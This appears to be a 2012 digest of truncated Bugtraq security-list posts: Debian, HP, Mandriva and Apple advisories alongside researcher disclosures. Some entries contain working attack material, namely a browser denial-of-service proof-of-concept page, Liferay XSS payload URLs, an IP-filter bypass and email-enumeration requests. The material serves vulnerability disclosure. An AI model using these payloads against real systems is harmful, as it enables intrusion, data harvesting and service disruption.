gmane.comp.security.bugtraq

New Open Source Web Application Vulnerability Scanner Available

2012-05-16T23:30:29

Hi All,

There is a new web application vulnerability scanner available. It is called WebVulScan and it is open source. Here is the link for it if you want to check it out: http://code.google.com/p/webvulscan/

Regards,

Dermot Blair

[SECURITY] [DSA 2475-1] openssl security update

Raphael Geissert — 2012-05-17T23:14:31

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2475-1                   security< at >debian.org
http://www.debian.org/security/                          Raphael Geissert
May 17, 2012                           http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : openssl
Vulnerability  : integer underflow
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2012-2333

It was discovered that openssl did not correctly handle explicit
Initialization Vectors for CBC encryption modes, as used in TLS 1.1,
1.2, and DTLS. An incorrect calculation would lead to an integer
underflow and incorrect memory access, causing denial of service
(application crash.)

For the stable distribution (squeeze), this problem has been fixed in
version 0.9.8o-4squeeze13.

For the testing distribution (wheezy), and the unstable distribution
(sid), this

[security bulletin] HPSBOV02780 SSRT100766 rev.1 - HP OpenVMS ACMELOGIN, Local Unauthorized

2012-05-17T22:16:06

Access and Increased Privileges

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03333494

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03333494
Version: 1

HPSBOV02780 SSRT100766 rev.1 - HP OpenVMS ACMELOGIN, Local Unauthorized
Access and Increased Privileges

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2012-05-17
Last Updated: 2012-05-17

Potential Security Impact: Local unauthorized access and increased
priviileges

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with OpenVMS ACMELOGIN
when SYS$ACM system service for authentication is enabled. The vulnerability
could be locally exploited to allow unauthorized access and increased
privileges.

References: CVE-2012-2010

SUPPORTED SOFTWARE

[SECURITY] [DSA 2474-1] ikiwiki security update

Raphael Geissert — 2012-05-17T05:17:26

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2474-1                   security< at >debian.org
http://www.debian.org/security/                          Raphael Geissert
May 16, 2012                           http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : ikiwiki
Vulnerability  : cross-site scripting
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2012-0220

Raúl Benencia discovered that ikiwiki, a wiki compiler, does not
properly escape the author (and its URL) of certain metadata, such as
comments. This might be used to conduct cross-site scripting attacks.

For the stable distribution (squeeze), this problem has been fixed in
version 3.20100815.9.

For the testing distribution (wheezy), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in
version 3.20120516.

DDIVRT-2012-44 Epicor Returns Management SOAP-Based Blind SQL Injection

2012-05-16T20:27:44

Title
-----
DDIVRT-2012-44 Epicor Returns Management SOAP-Based Blind SQL Injection

Severity
--------
High

Date Discovered
---------------
April 12, 2012

Discovered By
-------------
Digital Defense, Inc. Vulnerability Research Team
Credit: Chris Graham and r< at >b13$

Vulnerability Description
-------------------------
Digital Defense, Inc. (DDI) has discovered a blind SQL injection vulnerability in the Epicor Returns Management software SOAP interface. Left unremediated, this vulnerability could be leveraged by an attacker to execute arbitrary SQL commands and extract information from the backend database using standard SQL exploitation techniques. Additionally, an attacker may be able to leverage this flaw to compromise the database server host operating system.

Solution Description
--------------------
Epicor Software Corporation has confirmed they have now contacted the customers affected, and have made an update available to address this vulnerability. As such, DDI recommends restricting access to the a

[security bulletin] HPSBUX02782 SSRT100844 rev.1 - HP-UX Running OpenSSL, Remote Denial of

2012-05-17T17:48:49

Service (DoS)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03333987

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03333987
Version: 1

HPSBUX02782 SSRT100844 rev.1 - HP-UX Running OpenSSL, Remote Denial of
Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2012-05-17
Last Updated: 2012-05-17

- -----------------------------------------------------------------------------

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX OpenSSL.
This vulnerability could be exploited remotely to create a Denial of Service
(DoS).

References: CVE-2006-7250, CVE-2011-4619, CVE-2012-0884, CVE-2012-1165,
CVE-2012-2110, CVE-2012-2131

[security bulletin] HPSBUX02777 SSRT100854 rev.1 - HP-UX Running Java JRE and JDK, Remote Denial

2012-05-17T17:48:11

of Service (DoS), Unauthorized Modification and Disclosure of Information

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03316985

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03316985
Version: 1

HPSBUX02777 SSRT100854 rev.1 - HP-UX Running Java JRE and JDK, Remote Denial
of Service (DoS), Unauthorized Modification and Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2012-05-15
Last Updated: 2012-05-15

- -----------------------------------------------------------------------------

Potential Security Impact: Remote Denial of service, unauthorized
modification and disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified in Java Runtime
Environment

[ MDVSA-2012:078 ] imagemagick

2012-05-17T13:43:00

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2012:078
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : imagemagick
 Date    : May 17, 2012
 Affected: 2011.
 _______________________________________________________________________

 Problem Description:

 Multiple vulnerabilities has been found and corrected in imagemagick:
 
 A flaw was found in the way ImageMagick processed images with malformed
 Exchangeable image file format (Exif) metadata. An attacker could
 create a specially-crafted image file that, when opened by a victim,
 would cause ImageMagick to crash or, potentially, execute arbitrary
 code (CVE-2012-0247).
 
 A denial of service flaw was found in the way ImageMagick processed
 images with malformed Exif metadata. An attacker could create a
 specially-crafted image file that, when opened

[ MDVSA-2012:077 ] imagemagick

2012-05-17T13:23:01

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2012:077
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : imagemagick
 Date    : May 17, 2012
 Affected: 2010.1, Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

 Multiple vulnerabilities has been found and corrected in imagemagick:
 
 Untrusted search path vulnerability in configure.c in ImageMagick
 before 6.6.5-5, when MAGICKCORE_INSTALLED_SUPPORT is defined, allows
 local users to gain privileges via a Trojan horse configuration file
 in the current working directory (CVE-2010-4167).
 
 A flaw was found in the way ImageMagick processed images with malformed
 Exchangeable image file format (Exif) metadata. An attacker could
 create a specially-crafted image file that, when opened by a

[SECURITY] [DSA 2473-1] openoffice.org security update

Florian Weimer — 2012-05-16T22:04:38

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2473-1                   security< at >debian.org
http://www.debian.org/security/                            Florian Weimer
May 16, 2012                           http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : openoffice.org
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE ID         : CVE-2012-1149

Tielei Wang discovered that OpenOffice.org does not allocate a large
enough memory region when processing a specially crafted JPEG object,
leading to a heap-based buffer overflow and potentially arbitrary code
execution.

For the stable distribution (squeeze), this problem has been fixed in
version 1:3.2.1-11+squeeze5.

For the testing distribution (wheezy) and the unstable distribution
(sid), this problem has been fixed in version 1:3.4.5-1 of the

FlashPeak SlimBrowser TITLE Denial Of Service Vulnerability

2012-05-16T15:12:57

Title: FlashPeak SlimBrowser TITLE Denial Of Service Vulnerability
Software : FlashPeak SlimBrowser

Software Version : 6.0.1.38

Vendor: FlashPeak Inc.(www.flashpeak.com/) 

Vulnerability Published : 2012-05-16

Vulnerability Update Time :

Status : 

Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P)

Bug Description :
FlashPeak SlimBrowser is a web browser Software for FREE.
FlashPeak SlimBrowser contains one denial of service vulnerability about surfing a html file has a long web TITLE by remote or locality.

Proof Of Concept :
-----------------------------------------------------------
<html>
<head>
<title>evil page</title>
<body bgcolor="black">
<script type="text/javascript">
function a7(){
var buffer = "";
for (var i = 0; i < 1011; i++) {
buffer += "A";
}
document.title = buffer;
}
</script>
</head>
<body>
<font color="white">
<h5>==> <a href="javascript:a7();">'A'x1011</a> <==</h5><br>
<font>
</body>
</html>
-----------------------------------------------------------

Credits : This

The story of the Linux kernel 3.x...

2012-05-15T22:40:08

The story of the Linux kernel 3.x...

In 2005 everybody was exited about possibility of bypass ASLR on all
Linux 2.6 kernels because of the new concept called VDSO (Virtual
Dynamic Shared Object). More information about this story can be found
at the following link:
http://www.trilithium.com/johan/2005/08/linux-gate/

In short, VDSO was mmap'ed by the kernel in the user space memory always
at the same fixed address. Because of that well-known technique
ret-to-libc (or as some ppl prefer ROP) was possible and effective
to bypass existing security mitigation in the system.

.. 6 years later Linus Torvalds announced the release of the new kernel
version - 3.x! Now, guess what happened...

pi3-darkstar new # uname -r
3.2.12-gentoo
pi3-darkstar new # cat /proc/sys/kernel/randomize_va_space 
2
pi3-darkstar new # cat /proc/self/maps|tail -2
bfa81000-bfaa2000 rw-p 00000000 00:00 0          [stack]
ffffe000-fffff000 r-xp 00000000 00:00 0          [vdso]
pi3-darkstar new # cat /proc/self/maps|tail -2
bfd5e000-bfd7f000

Re: Trigerring Java code from a SVG image

Nicolas Grégoire — 2012-05-16T11:38:38


There's probably some others softwares implementing this feature, but
not browsers (luckily !).

Regards,
Nicolas

[SECURITY] [DSA 2472-1] gridengine security update

Florian Weimer — 2012-05-16T05:54:05

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2472-1                   security< at >debian.org
http://www.debian.org/security/                            Florian Weimer
May 15, 2012                           http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : gridengine
Vulnerability  : privilege escalation
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2012-0208

Dave Love discovered that users who are allowed to submit jobs to a
Grid Engine installation can escalate their privileges to root because
the environment is not properly sanitized before creating processes.

For the stable distribution (squeeze), this problem has been fixed in
version 6.2u5-1squeeze1.

For the unstable distribution (sid), this problem has been fixed in
version 6.2u5-6.

We recommend that you upgrade your gridengine packages.

Further inf

APPLE-SA-2012-05-15-1 QuickTime 7.7.2

Apple Product Security — 2012-05-15T20:17:43

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

APPLE-SA-2012-05-15-1 QuickTime 7.7.2

QuickTime 7.7.2 is now available and addresses the following:

QuickTime
Available for:  Windows 7, Vista, XP SP2 or later
Impact:  Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description:  Multiple stack overflows existed in QuickTime's
handling of TeXML files. These issues do not affect OS X systems.
CVE-ID
CVE-2012-0663 : Alexander Gavrun working with HP's Zero Day
Initiative

QuickTime
Available for:  Windows 7, Vista, XP SP2 or later
Impact:  Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description:  A heap overflow existed in QuickTime's handling of text
tracks. This issue does not affect OS X systems.
CVE-ID
CVE-2012-0664 : Alexander Gavrun working with HP's Zero Day
Initiative

QuickTime
Available for:  Windows 7, Vista, XP SP2 or later
Impact:  Viewing a maliciously craf

Liferay 6.1 json webservices are subject to cross-site request forgery attacks

Jelmer Kuperus — 2012-05-13T10:29:55

Liferay 6.1 json webservices are subject to cross-site request forgery attacks

Description:

Liferay Portal is an enterprise portal written in Java

If a user is currently logged in to the portal (or has ticked the
remember me box) then with a
little help of social engineering (like sending a link via
email/chat), an attacker can read most
data the logged in user is priviliged to see. The reason for this is
that the new json webservices
let you pass along the name of a javascript function that should be
called with the result of
the invocation (jsonp). Because the HTML <script> tag does not respect
the same origin policy in web
browser implementations, a malicious page can request and obtain JSON
data belonging to the portal
by using the techniques described in this article

http://www.xml.com/pub/a/2005/12/21/json-dynamic-script-tag.html

Code demonstrating the vulnerability can be found at

http://issues.liferay.com/secure/attachment/46878/fun.html

Systems affected

Liferay 6.1 ce
Liferay 6.1 ee

Vendor

[ MDVSA-2012:075 ] ffmpeg

2012-05-15T12:15:01

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2012:075
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : ffmpeg
 Date    : May 15, 2012
 Affected: 2010.1
 _______________________________________________________________________

 Problem Description:

 Multiple vulnerabilities has been found and corrected in ffmpeg:
 
 The Matroska format decoder in FFmpeg does not properly allocate
 memory, which allows remote attackers to execute arbitrary code via
 a crafted file (CVE-2011-3362, CVE-2011-3504).
 
 cavsdec.c in libavcodec in FFmpeg allows remote attackers to cause
 a denial of service (incorrect write operation and application
 crash) via an invalid bitstream in a Chinese AVS video (aka CAVS)
 file, related to the decode_residual_block, check_for_slice,
 and cavs_decode_frame functions, a different vul

Liferay 6.1 can be compromised without having an account on the portal

Jelmer Kuperus — 2012-05-13T09:29:36

Liferay 6.1 can be compromised without having an account on the portal

Description:

Liferay Portal is an enterprise portal written in Java

Liferay in it's default configuration exposes a number of remotely
accessible webservices.
Access to these services is restricted by an ip block.

It is possible to circumvent this ip block in the following way :

http://vulnerablehost/?p_p_id=58&p_p_lifecycle=2&p_p_resource_id=/path/to/remote/endpoint

By invoking such an url you trigger a call to
requestDispatcher.forward() Because the ip filter was
not configured to filter forward targets This allows you to call
servlets that would otherwise be
inaccessible.

One type of remote service that is exposed is the tunnel service. This
service does not validate
user passwords. Therefore by presenting the userid of an admin user to
this service it is possible
to completely compromise the server.

An account on the portal is not required in order to exploit this
vulnerability.

Proof of concept:

Code demonstrating the vulne

Guests can view names and emailadresses of all Liferay users in liferay 6.1

Jelmer Kuperus — 2012-05-13T09:41:35

Guests can view names and emailadresses of all Liferay users in liferay 6.1

Description:

Liferay Portal is an enterprise portal written in Java

As an unauthenticated user it is possible to retrieve the names and
email adresses of all Liferay users.
To retrieve a list of all users simply issue the following request

http://vulnerablehost/c/search/open_search?p=1&c=5000&keywords=entryClassName:com.liferay.portal.model.User

Getting to the email adresses is a bit more involved, because these
are not included in the response. But it is still possible to get to
them by utilizing wildcard searches. The following request will return
all users who's email address start with a "b"

http://vulnerablehost/c/search/open_search?p=1&c=5000&keywords=emailAddress:b*

By adding a letter at a time to the emailAddress parameter its
possible to eventually get someone's full email address

Proof of concept:

Code demonstrating the vulnerability can be found at

https://github.com/jelmerk/liferay-opensearch-exploit

Systems af

Multiple xss issues in Liferay

Jelmer Kuperus — 2012-05-13T10:12:21

Multiple xss issues in Liferay

Description:

Liferay Portal is an enterprise portal written in Java

Multiple xss vulnerabilities where found in liferay. Because liferay
has a "remember me"
option in their login screen that stores an encrypted password in a
cookie this is more
problematic than it otherwise would be

1. xss vulnerability in upload_progress_poller.jsp

http://vulnerablehost/html/portal/upload_progress_poller.jsp?uploadProgressId=a%3D1%3Balert%28document.cookie%29%3B%2F%2F

2. xss vulnerability in ckeditor.jsp

http://vulnerablehost?p_p_id=15&p_p_lifecycle=2&_15_struts_action=/journal/edit_article&ckEditorConfigFileName=ckconfig.jsp%27%2Ca%3Aalert%28document.cookie%29%2Cb%3A%27

3. xss vulnerability in the currency converter portlet

To reproduce :

Drag the currency converter on the home page then go to :

http://localhost:8080/web/guest/home?_16_chartId=%22/%3E%3Cscript%20type=%22text/javascript%22%3Ealert(123);%3C/script%3E&p_p_id=16&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&p_p_col

APPLE-SA-2012-05-14-2 Leopard Security Update 2012-003

Apple Product Security — 2012-05-14T20:31:58

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

APPLE-SA-2012-05-14-2 Leopard Security Update 2012-003

Leopard Security Update 2012-003 is now available and addresses the
following:

Internet plug-ins
Available for:  Mac OS X v10.5 to 10.5.8 Intel
Impact:  Out-of-date versions of Adobe Flash Player are disabled
Description:  This update disables Adobe Flash Player if it is older
than 10.1.102.64 by moving its files to a new directory. This update
presents the option to install an updated version of Flash Player
from the Adobe website.

Leopard Security Update 2012-003 may be obtained from
the Software Update pane in System Preferences, or Apple's Software
Downloads web site:
http://www.apple.com/support/downloads/

The download file is named: SecUpd2012-003.dmg
Its SHA-1 digest is: dc0b70cdcc896838fca9bf7ea4b867ec3cca48d4

Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222

This message is signed with Apple's Product Security PGP key,
and details are av